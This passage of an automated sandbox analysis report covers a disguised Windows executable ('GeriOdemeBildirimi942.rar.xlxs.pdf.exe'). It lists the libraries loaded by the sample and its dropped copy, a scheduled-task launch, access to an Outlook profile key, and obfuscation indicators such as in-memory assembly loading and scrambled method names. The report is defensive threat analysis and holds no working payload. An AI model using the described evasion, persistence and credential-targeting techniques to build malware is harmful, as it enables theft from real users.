Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: NRtD.pdbSHA256 source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
Source: Binary string: NRtD.pdb source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, authorizationForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: SOFcFE.exe.1.dr, authorizationForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.3eca230.0.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs .Net Code: hOpvyx6Zcc System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.5870000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs .Net Code: hOpvyx6Zcc System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: 0xBF3BC221 [Tue Sep 1 20:22:57 2071 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010A47B0 push esi; iretd 1_2_010A47B2
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010A465B push edx; iretd 1_2_010A4662
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010A4658 push edx; iretd 1_2_010A465A
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010A46BB push edx; iretd 1_2_010A46BE
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010A46B8 push edx; iretd 1_2_010A46BA
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010A46BF push edx; iretd 1_2_010A46C2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_0267465B push edx; iretd 16_2_02674662
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_02674658 push edx; iretd 16_2_0267465A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_026746BF push edx; iretd 16_2_026746C2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_026746BB push edx; iretd 16_2_026746BE
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_026746B8 push edx; iretd 16_2_026746BA
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_026747B0 push esi; iretd 16_2_026747B2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C30007 push 00300100h; ret 20_2_02C3001A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7C75D push es; ret 20_2_06A7C7C0
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: section name: .text entropy: 7.588327362841595
Source: SOFcFE.exe.1.dr Static PE information: section name: .text entropy: 7.588327362841595
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, wfmuxKccGtsDajMlAe.cs High entropy of concatenated method names: 'OFNMeY08RZ', 'qooMTFRYAO', 'UmcYCeftjN', 'meTYGTXb3o', 'dJIM3tg1RY', 'Ef9MW42Y2M', 'G1aMhp6Cas', 'NfFMuVNOiC', 'SumMr7axBG', 'WvYMFlVHNg'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, qfVZ9t1fu6WDpyoTODH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eUbPuTJwP4', 'WxePr4Ic8Q', 'i2bPFK5HF9', 'ffjPOWNyJ0', 'qwgPHST8ek', 'AfUP0vHQMw', 'AAoPKXEXKf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, AkvZU4WDIaFkxJmh7r.cs High entropy of concatenated method names: 'QePDuVyYBW', 'Lw9DrmqQtw', 'wKEDFA9vFu', 'zYkDOuNZpA', 'dCgDHdo44y', 'xIsD0PiDAA', 'iubDK0pAvv', 'CpMDe7beF7', 'JgkDsAUS3x', 'vwDDT6gFh2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, b2mCNG10iQkY19oTwYA.cs High entropy of concatenated method names: 'jMqR1XVLKm', 'wM7RN6SktP', 'MMqRymU4gw', 'PXrRiLFSWo', 'TtpRIIxplk', 'kBvRxIJbHG', 'FM0RlyKDR9', 'UyJR4xSv43', 'iotRbCacGv', 'nYmRBUCcof'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, hLi8mXJ5Khswjlivkb.cs High entropy of concatenated method names: 'BDm2f5ElpD', 'Oec2DZOLrN', 'JwY2kklVBd', 'StV2wJcW0B', 'HyM2LjlMfN', 'mfqkHDPnFP', 'iQwk0gp1ej', 'Xt0kKCUqd0', 'iouke22xIe', 'axskspvN6t'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, sfppKNqtuStwuHs2PL.cs High entropy of concatenated method names: 'R6wRGVUWvx', 'uXyRnrmeHk', 'KTcRvJd7Xy', 'rXGRXKVMRt', 'lJNRDE8G5P', 'UnqRkcbxpX', 'sGmR26QG4K', 'nQhYKT1RNP', 'P2sYeyIuML', 'pMcYsvYI68'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, YuOfOPHITqDbKEIJ9U.cs High entropy of concatenated method names: 'vb7yjt2D2', 'rjYisIsYe', 'uXXxXgLFa', 'BVhlStUG4', 'H9ObnC0r4', 'KqYBYCiST', 'lUNHhiQ80hpvqj4f6G', 'xrsCsvi5fXTpegWPi4', 'n1Xmbrd9GQ34gYhd0o', 'hYVYoCASH'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs High entropy of concatenated method names: 'QW8nfX3DxC', 'Y9RnXYgKYD', 'AVdnD9EfWE', 'DWunqKUuFe', 'simnkFs9u9', 'wyln2RUhyR', 'gvonwbsdwS', 'HGLnLcg8dG', 'yoAnEuHcmw', 'bdpnAsPPj2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, fh0VDChk6xbBJVGHfn.cs High entropy of concatenated method names: 'iGxg4Hke4k', 'FiUgbNodeP', 'zUCgmNidVO', 'YQQgcZI97h', 'xaTg7aj9vE', 'EeVgtQ4MAW', 'kIVgZUgmK4', 'riJgQiMMs0', 'jKegdIjXf1', 'HtUg3BktZR'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, xLgx0wL9epL6YDiocQ.cs High entropy of concatenated method names: 'jijw1bKQoJ', 'jAOwNk9buI', 'hbGwyPoaEi', 'eKlwiXaajX', 'BdQwIjLBG0', 'cswwxavNfY', 'BUpwlenTGf', 'p8Dw4vxZZq', 'x0jwbHCCTj', 'tt9wBC898g'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, LLP85LTDBHgT5Iin7N.cs High entropy of concatenated method names: 'mksqinZTmH', 'QSUqx4kNkL', 'XhTq47C0Iv', 'WCMqbPGT7G', 'E7yq8Gl6Td', 'Vx8qU7w6Tl', 'XAnqMkClux', 'LXjqYFarEi', 'u0SqRd8Gay', 'b1dqP88HOG'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, XPp2DtzlxtLiZfOYCO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qMlRgeOvCP', 'nfsR8knFv7', 'kIARUGgUkq', 'HfcRMrkGoG', 'DdsRYp0gZG', 'gnaRR38phV', 'MO2RPMF3ub'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, RSYeSwYT0Sh5pRPAbT.cs High entropy of concatenated method names: 'Dispose', 'zklGsPxsHV', 'g3CScc5bbG', 'QZKjj65YcT', 'WNTGT6enkE', 'KDiGzPePyZ', 'ProcessDialogKey', 'sYPSCeJLX8', 'sjySGgmnxr', 'LwlSSYtBuj'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, T47EeKuAlyHS1bEdGK.cs High entropy of concatenated method names: 'wOLYm2MP6N', 'mZoYcl2U9u', 'jwaY5ldwFK', 'troY7IOgQi', 'x1kYu8NO7E', 'xHCYtiYIwN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, IoII6EEbDCScbo28Np.cs High entropy of concatenated method names: 'g4Q8diZUls', 'xEa8WnfNBc', 'Auk8uAyN8m', 'cZi8rxZVdv', 'J5l8cbUepV', 'M3185uaraa', 'jAc87pi2qS', 'X0Z8tolEnA', 'xqS8Jtrhoa', 'b748Z5aDhf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, Sm0QWOUtRIVaGPnUQj.cs High entropy of concatenated method names: 'CJkYXehmWF', 'QVLYD44ftN', 'GsuYqfj1N3', 'KkCYktqkTs', 'KDyY2fePJ2', 'zHVYw28hX3', 'ybOYLYp6Bl', 'JpUYEXbbH7', 'LDyYAwKZiI', 'neDY9pcyPZ'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, yx3eKTRD6e5DRY0EXd.cs High entropy of concatenated method names: 'hvhMAgvqeq', 'AnbM9q6CNC', 'ToString', 'X6eMXTJoBL', 'OsWMD4GS0B', 'y2FMq6o0TZ', 'YVTMkIcK1b', 'RUhM2sjmOd', 'Hq4MwrkBi3', 'A2lMLiJrYN'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, OldAHhkVUFSgVhwLNN.cs High entropy of concatenated method names: 'w9twXmWo2w', 'l6IwqehMMI', 'A6Sw2np7Av', 'cwS2TyoAE7', 'wTX2zSVA0e', 'zjawCtL0Bx', 'xbTwGDkWJZ', 'VD7wS7dJii', 'jP3wnU4eOG', 'OZlwvrGFLY'
